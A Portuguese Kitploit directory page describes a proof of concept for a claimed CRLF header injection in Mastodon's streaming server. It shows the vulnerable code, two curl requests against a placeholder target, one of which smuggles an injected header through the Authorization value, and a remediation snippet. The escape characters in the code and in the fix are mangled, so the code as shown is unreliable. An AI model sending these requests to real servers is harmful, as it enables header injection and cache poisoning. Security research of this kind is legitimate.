Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-Mastodon-Streaming-CRLF-Injection — Mastodon Streaming Server Security Vulnerability PoC - CVE-2026-Mastodon-Streaming-CRLF-Injection | Kitploit
Ferramentas/GitHubGitHub/1402307692/cve-2026-mastodon-streaming-crlf-injection
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHub1402307692/cve-2026-mastodon-streaming-crlf-injection

CVE-2026-Mastodon-Streaming-CRLF-Injection

Mastodon Streaming Server Security Vulnerability PoC - CVE-2026-Mastodon-Streaming-CRLF-Injection

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite
há 4 mesesAinda não revisado

CVE-2026-XXXXX: Injeção de Cabeçalho de Resposta HTTP (CRLF) no Servidor de Streaming do Mastodon

Visão Geral da Vulnerabilidade

ItemDetalhes
ID CVECVE-2026-XXXXX
Produto AfetadoMastodon (Servidor de Streaming)
Versão Afetada<= 4.5.9
Componentestreaming/index.js linhas 188-206
Tipo de VulnerabilidadeInjeção de Cabeçalho de Resposta HTTP / Injeção CRLF
CWECWE-74
CVSS 3.16.5 (Médio)
Vetor de AtaqueRede
Reportado porqitian [email protected]

Descrição da Vulnerabilidade

Quando uma solicitação de upgrade WebSocket falha na autenticação, o Servidor de Streaming do Mastodon em streaming/index.js linhas 188-206 constrói uma resposta HTTP manual e escreve errorMessage diretamente no cabeçalho de resposta X-Error-Message via socket.end() SEM sanitizar os caracteres ou .

Isso permite que um atacante remoto não autenticado injete cabeçalhos HTTP arbitrários ou realize Divisão de Resposta HTTP (HTTP Response Splitting).

Código Vulnerável (streaming/index.js linhas 188-206)

root@kitploit:~
const { statusCode, errorMessage } = extractErrorStatusAndMessage(err);
const headers = {
  'Connection': 'close',
  'Content-Type': 'text/plain',
  'Content-Length': 0,
  'X-Request-Id': request.id,
  'X-Error-Message': errorMessage   // NO CRLF sanitization
};
socket.end(
  `HTTP/1.1 ${statusCode} ${http.STATUS_CODES[statusCode]}
` +
  `${Object.keys(headers).map((key) => `${key}: ${headers[key]}`).join('
')}

`
);

Impacto

  • Injeção de Cabeçalho HTTP: Injetar cabeçalhos HTTP arbitrários
  • Divisão de Resposta HTTP: Injetar segundo corpo de resposta HTTP (envenenamento de cache)
  • Divulgação de Informações: Mensagens de erro internas expostas a usuários não autenticados

Prova de Conceito

PoC 1 - Detecção Básica

root@kitploit:~
curl -i -X GET \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  http://TARGET:4000/api/v1/streaming/user

Esperado: HTTP/1.1 401 Unauthorized, X-Error-Message: Missing access token

PoC 2 - Injeção CRLF

root@kitploit:~
curl -i -X GET \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  -H "Authorization: Bearer test%0d%0aX-Injected: evil" \
  http://TARGET:4000/api/v1/streaming/user

Remediação

Sanitizar errorMessage antes de escrever no cabeçalho do socket:

root@kitploit:~
const sanitizedMessage = String(errorMessage || '')
  .replace(/
/g, '%0D')
  .replace(/
/g, '%0A');
// OR use Node.js res.setHeader() API which prevents header injection

Linha do Tempo

DataEvento
2026-04-22Vulnerabilidade descoberta e PoC criada
2026-04-22Relatório CVE submetido ao MITRE / VDB

Referências

  • https://github.com/mastodon/mastodon
  • https://cwe.mitre.org/data/definitions/74.html

Aviso: Este PoC é apenas para fins educacionais e de pesquisa em segurança.

Baixar ferramenta